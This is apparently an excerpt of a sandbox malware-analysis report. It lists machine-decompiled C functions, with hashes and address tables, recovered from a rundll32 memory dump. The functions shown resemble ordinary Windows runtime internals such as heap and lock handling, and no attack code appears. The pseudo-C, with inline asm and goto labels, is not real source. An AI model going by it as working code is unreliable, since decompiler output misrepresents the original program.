                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9763cba94f4fcc2ddf8c1da770edfd113b2eee09b4a8c3a03e80c871131c8791
                                                                                            • Instruction ID: a58156d03f08cde7efc98821963030dbf80354f00aceeb45c2582f592fd17b21
                                                                                            • Opcode Fuzzy Hash: 9763cba94f4fcc2ddf8c1da770edfd113b2eee09b4a8c3a03e80c871131c8791
                                                                                            • Instruction Fuzzy Hash: BF214A70541601DFD725EF6AD140AA8BBF5FF85319B20926EC1168B394FB39E881CF98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046546A7 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E046546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0461F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0460D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L045F77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                            0x046546b7
                                                                                            0x046546ba
                                                                                            0x046546c5
                                                                                            0x046546c8
                                                                                            0x046546d0
                                                                                            0x046546d4
                                                                                            0x046546e6
                                                                                            0x046546e9
                                                                                            0x046546f4
                                                                                            0x046546ff
                                                                                            0x04654705
                                                                                            0x04654706
                                                                                            0x0465470c
                                                                                            0x04654713
                                                                                            0x0465471b
                                                                                            0x04654723
                                                                                            0x04654725
                                                                                            0x046546d6
                                                                                            0x046546d9
                                                                                            0x046546db
                                                                                            0x046546db
                                                                                            0x04654732

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                            • Instruction ID: 12a5a164e5cef96157db1c072d224a01d18f609b23e162e6c224c6360d31ec89
                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                            • Instruction Fuzzy Hash: BC112572604208BBDB059F5CD8809BEB7B9EF95304F1080AEF944C7350EA31AD51D7A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04602397 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 34%
                                                                                            			E04602397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x46c848c != 0) {
					L045FFAD0(0x46c8610);
					if( *0x46c848c == 0) {
						E045FFA00(0x46c8610, _t19, _t27, 0x46c8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04602581(0x46c8610, 0x45b50a0, _t26, _t27, _t28);
						E045FFA00(0x46c8610, 0x45b50a0, _t27, 0x46c8610);
					}
				} else {
					L1:
					_t11 =  *0x46c8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04614886(0x45b1088, 1, 0x46c8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04602581(0x46c8610, (_t11 << 4) + 0x45b5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                            0x046023b0
                                                                                            0x046023b6
                                                                                            0x04602409
                                                                                            0x04602415
                                                                                            0x04645ae9
                                                                                            0x00000000
                                                                                            0x0460241b
                                                                                            0x0460241b
                                                                                            0x0460241d
                                                                                            0x04602427
                                                                                            0x0460242e
                                                                                            0x04602430
                                                                                            0x04602430
                                                                                            0x046023b8
                                                                                            0x046023b8
                                                                                            0x046023b8
                                                                                            0x046023bf
                                                                                            0x046023fc
                                                                                            0x046023fc
                                                                                            0x046023c1
                                                                                            0x046023c3
                                                                                            0x046023d0
                                                                                            0x046023d8
                                                                                            0x046023d8
                                                                                            0x046023dc
                                                                                            0x046023de
                                                                                            0x046023e1
                                                                                            0x046023e1
                                                                                            0x046023ec

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d143f44eafb98dcf304cc8f4f8b05c31df3a6725ba07a7bdd59cb564d947e752
                                                                                            • Instruction ID: ee6fbb055b41689647d96dfd976a1fe9c0586cbe8f4e6a1e8c5503a76ca81d1f
                                                                                            • Opcode Fuzzy Hash: d143f44eafb98dcf304cc8f4f8b05c31df3a6725ba07a7bdd59cb564d947e752
                                                                                            • Instruction Fuzzy Hash: 4F11E93270470067F739AB299C58B2663C8FF90619F14845AA646A72D0F5B4FC419699
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DC962 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 42%
                                                                                            			E045DC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x46cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E045EEEF0(0x46c70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0465F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E045EEB70(_t29, 0x46c70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0461B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0465F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x46c70c0; // 0x0
					while(_t38 != 0x46c70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x46cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                            0x045dc96a
                                                                                            0x045dc974
                                                                                            0x045dc988
                                                                                            0x045dc98a
                                                                                            0x04647c9d
                                                                                            0x04647c9f
                                                                                            0x04647ca4
                                                                                            0x04647cae
                                                                                            0x04647cf0
                                                                                            0x04647cf5
                                                                                            0x04647cfa
                                                                                            0x045dc992
                                                                                            0x045dc996
                                                                                            0x045dc997
                                                                                            0x045dc998
                                                                                            0x045dc9a3
                                                                                            0x045dc9a3
                                                                                            0x04647cb0
                                                                                            0x04647cb7
                                                                                            0x04647cbb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647cbd
                                                                                            0x04647ce8
                                                                                            0x04647cc5
                                                                                            0x04647cc8
                                                                                            0x04647cca
                                                                                            0x04647cd0
                                                                                            0x04647cd6
                                                                                            0x04647cde
                                                                                            0x04647ce4
                                                                                            0x04647ce4
                                                                                            0x04647cd0
                                                                                            0x00000000
                                                                                            0x04647ce8
                                                                                            0x045dc990
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b9fb231153e71b417ad62bd702f8e00d0b072a946916fea0feb48995c7db55d
                                                                                            • Instruction ID: fe23cbea831ebffcef4666650c79d40c0b3c5949c5753934a91e756482db776a
                                                                                            • Opcode Fuzzy Hash: 3b9fb231153e71b417ad62bd702f8e00d0b072a946916fea0feb48995c7db55d
                                                                                            • Instruction Fuzzy Hash: 7E11CEB27106069FDB24AF68DC86A3A77A6FBC8616B00052CE94583660FB24FC10DBD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046137F5 Relevance: .1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E046137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E045F2280(_t6, 0x46c8550);
				}
				_t29 = E0461387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E045EFFB0(0x46c8550, _t27, 0x46c8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                            0x046137fa
                                                                                            0x046137fc
                                                                                            0x04613805
                                                                                            0x04613808
                                                                                            0x04613808
                                                                                            0x04613814
                                                                                            0x04613818
                                                                                            0x04613846
                                                                                            0x04613848
                                                                                            0x0461384b
                                                                                            0x0461384b
                                                                                            0x04613852
                                                                                            0x00000000
                                                                                            0x04613854
                                                                                            0x04613856
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04613863
                                                                                            0x00000000
                                                                                            0x04613863
                                                                                            0x0461381a
                                                                                            0x0461381a
                                                                                            0x0461381f
                                                                                            0x0461386e
                                                                                            0x0461386e
                                                                                            0x04613871
                                                                                            0x04613873
                                                                                            0x04613873
                                                                                            0x04613868
                                                                                            0x00000000
                                                                                            0x04613868
                                                                                            0x04613821
                                                                                            0x04613826
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04613828
                                                                                            0x0461382a
                                                                                            0x04613841
                                                                                            0x00000000
                                                                                            0x04613841

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 261966823295322df5e859149fd1e9526ca74792649e1552bc6d576b87694ba0
                                                                                            • Instruction ID: 661dcf68dc94d6dd42c948e1ea05d383909533a29d6712b3102a2b6b6a2ad735
                                                                                            • Opcode Fuzzy Hash: 261966823295322df5e859149fd1e9526ca74792649e1552bc6d576b87694ba0
                                                                                            • Instruction Fuzzy Hash: 0A01C8B2A016519BE3779F1A9940A26BBA6DFD5B50719406DED4B8B360F730F841C780
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460002D Relevance: .1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0460002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E045F7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E045F7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E045F7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E045F7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                            0x04600032
                                                                                            0x04600037
                                                                                            0x04600043
                                                                                            0x04644b3a
                                                                                            0x04600049
                                                                                            0x04600049
                                                                                            0x04600049
                                                                                            0x0460004e
                                                                                            0x04600053
                                                                                            0x04644b48
                                                                                            0x04644b5a
                                                                                            0x04644b4a
                                                                                            0x04644b53
                                                                                            0x04644b53
                                                                                            0x04644b5f
                                                                                            0x00000000
                                                                                            0x04644b61
                                                                                            0x00000000
                                                                                            0x04644b61
                                                                                            0x04600059
                                                                                            0x04600059
                                                                                            0x04600060
                                                                                            0x04644b6f
                                                                                            0x04644b6f
                                                                                            0x04600069
                                                                                            0x04644b83
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644b90
                                                                                            0x04644b9b
                                                                                            0x04644b9b
                                                                                            0x04644ba4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04644baa
                                                                                            0x00000000
                                                                                            0x0460006f
                                                                                            0x0460006f
                                                                                            0x00000000
                                                                                            0x0460006f
                                                                                            0x04600069

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                            • Instruction ID: 73ba456b1593c49021ed09213dd8938e2df5b42eb283f924d45841c5495ee29a
                                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                            • Instruction Fuzzy Hash: 3D11E1326056829FEB229B28DD45B3637D4AF94758F0900A0DD0587792FB28F842D261
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E766D Relevance: .1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E045E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0460F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0460F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L045F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                            0x045e7672
                                                                                            0x045e767f
                                                                                            0x045e7689
                                                                                            0x045e76de
                                                                                            0x045e76de
                                                                                            0x045e768b
                                                                                            0x045e7691
                                                                                            0x045e7693
                                                                                            0x045e7697
                                                                                            0x00000000
                                                                                            0x045e7699
                                                                                            0x045e76a8
                                                                                            0x00000000
                                                                                            0x045e76aa
                                                                                            0x045e76ad
                                                                                            0x045e76b1
                                                                                            0x00000000
                                                                                            0x045e76b3
                                                                                            0x045e76b3
                                                                                            0x045e76b5
                                                                                            0x045e76ba
                                                                                            0x045e76bc
                                                                                            0x045e76bc
                                                                                            0x045e76c0
                                                                                            0x00000000
                                                                                            0x045e76c2
                                                                                            0x045e76ce
                                                                                            0x045e76ce
                                                                                            0x045e76c0
                                                                                            0x045e76b1
                                                                                            0x045e76a8
                                                                                            0x045e7697
                                                                                            0x045e76d9

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                            • Instruction ID: 3e16d8d6f8012713c9b9d8f998217163efeb74a657737a068a3b55e2d15f07a0
                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                            • Instruction Fuzzy Hash: B1018872700129EFD728BE5FDC41E6B77ADFB88764B144524BA08CB250DA70EE01D7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0466C450 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 46%
                                                                                            			E0466C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04619910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E046195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E046195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E046195D0();
				return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                            0x0466c458
                                                                                            0x0466c45d
                                                                                            0x0466c466
                                                                                            0x0466c468
                                                                                            0x0466c469
                                                                                            0x0466c46a
                                                                                            0x0466c46b
                                                                                            0x0466c46e
                                                                                            0x0466c46f
                                                                                            0x0466c471
                                                                                            0x0466c476
                                                                                            0x0466c476
                                                                                            0x0466c47c
                                                                                            0x0466c47e
                                                                                            0x0466c480
                                                                                            0x0466c480
                                                                                            0x0466c483
                                                                                            0x0466c484
                                                                                            0x0466c486
                                                                                            0x0466c488
                                                                                            0x0466c48f
                                                                                            0x0466c491
                                                                                            0x0466c493
                                                                                            0x0466c493
                                                                                            0x0466c48f
                                                                                            0x0466c498
                                                                                            0x0466c49e
                                                                                            0x0466c4ad
                                                                                            0x0466c4ad
                                                                                            0x0466c4b2
                                                                                            0x0466c4b4
                                                                                            0x0466c4cd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                            • Instruction ID: 00609db0f067d6387c94d84de16ec5a5a0dd0306ed9ec08e1370a63751bf9c4d
                                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                            • Instruction Fuzzy Hash: 8201D2B2140A05BFE721AF25CC80EA2FB7DFF54394F044529F25552670EB22BCA1CAA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D9080 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E045D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x46c85ec;
				E045F2280(_t48, 0x46c85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E045EFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x46c538c; // 0x29fb0d8
					if( *_t84 != 0x46c5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x46af6e8);
						E0462D0E8(0x46c85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E046A88F5(_t80, _t85, 0x46c5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x46c86c0; // 0x29e07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x46c86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E045F2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E046A88F5(0x46c85ec, _t85, 0x46c5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0461AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x46cb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x46c84c0;
																			if(_t82 >=  *0x46c84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E046A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
